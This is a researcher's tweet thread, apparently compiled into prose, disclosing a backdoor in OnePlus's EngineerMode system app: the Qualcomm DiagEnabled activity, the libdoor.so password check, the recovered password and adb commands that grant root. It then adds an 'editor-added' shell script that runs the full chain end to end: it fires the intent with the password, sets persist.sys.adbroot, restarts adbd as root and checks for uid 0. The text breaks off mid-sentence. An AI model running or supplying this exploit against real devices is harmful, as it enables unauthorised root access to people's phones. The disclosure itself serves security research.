If you have a OnePlus device, I'm pretty sure you have this app pre-installed. To check, open Settings -> Apps -> Menu -> Show system apps and search for EngineerMode in the app list.
With the telephony secret code you can access manual tests like the GPS test and the root status test, as stated in this article https://www.xda-developers.com/oneplus-hardware-diagnostic-tests pointed out by @AleGrechi. But we can do better...
You can access the "main" activity by sending this command: adb shell am start com.android.engineeringmode/.EngineeringMode
You will have access to everything, not just the manual tests.
Having access to all these functions is a real issue. Combined with this attack, http://researchcenter.paloaltonetworks.com/2017/09/unit42-android-toast-overlay-attack-cloak-and-dagger-with-no-permissions, a malicious app can do a lot of things.
I will find time to make a POC. But it's not the biggest issue with this app.
The DiagEnabled activity, which is @Qualcomm-made, is the best class in this EngineerMode APK. Check the methods in this activity: escalatedUp(boolean, string) sounds like a cool thing, no?
In the onCreate method, if the intent is not null, the escalatedUp method is called with the parameters enable=true and password=getIntent().getStringExtra("code"). Do you see where I'm going?
The escalatedUp method calls Privilege.escalate(password) and, if the result is true, sets the system properties persist.sys.adbroot and oem.selinux.reload_policy to 1.
So yes, if you send the command: adb shell am start -n com.android.engineeringmode/.qualcomm.DiagEnabled --es "code" "password" with the correct code, you can become root!
Here is the Privilege class. Check the name of the native library used to check the code: door... Ladies and gentlemen, please say hi to the backdoor made by @Qualcomm.
This lib is located in /system/lib/libdoor.so or /system/lib64/libdoor.so. You can find the sample here: https://www.virustotal.com/#/file/3e6df251ad4fe115563b51b302fec2d7836e14dd28ae06e8b41c1939d4bca33d
These are the interesting strings of the lib. After a first read we can see that libcrypto is used and that the password and the key are backed up in /data/backup/fpwd and /data/backup/fkey.
This is the code responsible for the password verification. First it checks the length, then it calculates the hash and compares it to the correct one.
Unfortunately, I didn't find the password, so if some of you are skilled in reversing native libs, your help is very welcome!
If the verification passes, the password hash is stored in /data/backup/fpwd
and the key is made from different build properties like ro.build.type, ro.build.user, ... and stored in /data/backup/fkey.
Using @fridadotre and the script attached, I managed to bypass the escalate and isEscalated methods and become root.
Here is the source code of the EngineerMode apk: https://github.com/fs0c131y/EngineerMode. Feel free to dig on your own and share your findings!
cc @AndroidAuth @AndroidPolice @androidandme @Androidheadline @AndroidPolice @xdadevelopers @AndroidSPIN @Gadgets360 @TheHackersNews you have a subject here to write an article. It's not normal to have this kind of backdoor in an end-user product...
EngineerMode APK is not the only interesting app left by @Oneplus. More threads to come :)
Awesome! Thanks to @insitusec and the @NowSecureMobile team, we have the password! It's now possible to root an @Oneplus device with a simple intent.
I will publish an application on the PlayStore to root your @OnePlus device in the next hours.
Difficulty of installing #SuperSu: 0! Everything is already preinstalled.
The OnePlus root application is coming soon :)
The best thing in this story is the password. It's angela (see the reference?). This backdoor is here intentionally. When fiction becomes reality. Good luck @getpeid, you will need a very good explanation. cc @whoismrrobot
My Twitter at the moment. Thank you all for the impact you gave to this story!
I'm still waiting for more samples to confirm, but yes, EngineerMode is installed on the @OnePlus 5T. The DiagEnabled activity is here, so the backdoor is too :)
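The full chain from the thread, written up as an editor-added script (this is not the author's code and not the Frida script attached to the tweets): it checks that the EngineerMode package and libdoor.so are present, fires the DiagEnabled intent with the recovered code, and then verifies that persist.sys.adbroot flipped and that adbd now runs as root. The component name, the property name and the code "angela" are taken from the tweets above; re-attaching adbd with "adb root" after the property is set is an assumption, as is having adb on PATH with USB debugging enabled on the device. The helpers take captured command output as their argument so each check can be tried offline on sample text.

```shell
#!/bin/sh
# Editor-added example, not part of the thread. Checks a OnePlus device for the
# EngineerMode/DiagEnabled root path, triggers it, and verifies the result.
# Package, activity, property and code come from the thread; using "adb root"
# to restart adbd afterwards is an assumption.

PKG="com.android.engineeringmode"
ACTIVITY="$PKG/.qualcomm.DiagEnabled"
CODE="angela"

# The helpers take command output as their argument instead of calling adb,
# so every check can be exercised on captured text without a device.

# has_pkg "<pm list packages output>": true if EngineerMode is installed.
has_pkg() {
    printf '%s\n' "$1" | tr -d '\r' | grep -qx "package:$PKG"
}

# libdoor_present "<ls output>": true if a libdoor.so path is listed.
libdoor_present() {
    printf '%s\n' "$1" | tr -d '\r' | grep -q '/libdoor\.so$'
}

# adbroot_enabled "<getprop persist.sys.adbroot output>": true if it reads 1.
adbroot_enabled() {
    [ "$(printf '%s' "$1" | tr -d '\r\n\t ')" = "1" ]
}

# is_root "<id output>": true if the adb shell now runs as uid 0.
is_root() {
    printf '%s' "$1" | tr -d '\r' | grep -q '^uid=0('
}

main() {
    command -v adb >/dev/null 2>&1 || { echo "adb not found on PATH" >&2; return 2; }

    has_pkg "$(adb shell pm list packages)" \
        || { echo "EngineerMode ($PKG) is not installed"; return 1; }
    libdoor_present "$(adb shell ls /system/lib/libdoor.so /system/lib64/libdoor.so 2>/dev/null)" \
        || echo "note: libdoor.so not found; Privilege.escalate() may not be backed by it on this build"
    echo "before: persist.sys.adbroot=$(adb shell getprop persist.sys.adbroot)"

    # DiagEnabled.onCreate -> escalatedUp(true, code) -> Privilege.escalate(code);
    # on success it sets persist.sys.adbroot and oem.selinux.reload_policy to 1.
    adb shell am start -n "$ACTIVITY" --es code "$CODE"
    sleep 2
    adbroot_enabled "$(adb shell getprop persist.sys.adbroot)" \
        || { echo "persist.sys.adbroot still not 1: wrong code or activity absent"; return 1; }

    # Assumption: restart adbd as root now that the property is set.
    adb root >/dev/null 2>&1
    sleep 2
    if is_root "$(adb shell id)"; then
        echo "adbd is running as root"
    else
        echo "property is set but adbd is still unprivileged"
        return 1
    fi
}

main "$@"
```

Run it as "sh engmode_root.sh" with one device attached; exit status 2 means adb is missing, 1 means a check failed, 0 means the shell reported uid 0. The helpers strip carriage returns because older adb builds emit CRLF over "adb shell", which would otherwise break the exact-line match on the package name.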
This app is a system app made by